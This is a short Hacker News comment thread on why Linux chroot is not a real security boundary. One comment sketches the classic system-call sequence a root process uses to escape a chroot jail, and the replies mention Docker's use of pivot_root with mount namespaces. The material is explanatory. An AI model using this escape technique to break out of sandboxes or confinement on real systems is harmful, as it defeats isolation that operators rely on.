top | item 11558364

(no title)

marmight | 10 years ago

You're right insofar as you can't use the chroot command to escape a "chroot jail" because it automatically calls chdir() for you, but any root user can escape one by invoking the following linux system calls:

  chdir("/"); /* go to / of "chroot jail" */
  mkdir("foo", ...); /* create directory in jail */
  chroot("foo"); /* change / to foo */
  /* fail to chdir("foo"); */
  chdir(".."); /* instead go up parent (there is nothing preventing you since you are no longer in the "chroot jail" since the jail is now foo and you never entered it) */
  chdir("..");
  /* ... */
  chdir(".."); /* . is now the real root */
  chroot("."); /* change / to the real root */

This is why the man pages for the linux system call rightfully put "chroot jail" in scare quotes. They are trivially escaped by a root user making basic linux system calls, and the man pages even sketch out how for you. Some operating systems attempt to provide more secure chroot jails, but linux chroot() does not provide this.

discuss

comex|10 years ago

> Some operating systems attempt to provide more secure chroot jails, but linux chroot() does not provide this.

Note that this includes Linux itself with CLONE_NEWNS + pivot_root (which is what Docker does).

geofft|10 years ago

Oh! I didn't know Docker used pivot_root, and I was always curious why that call and chroot() both existed. This makes some sense.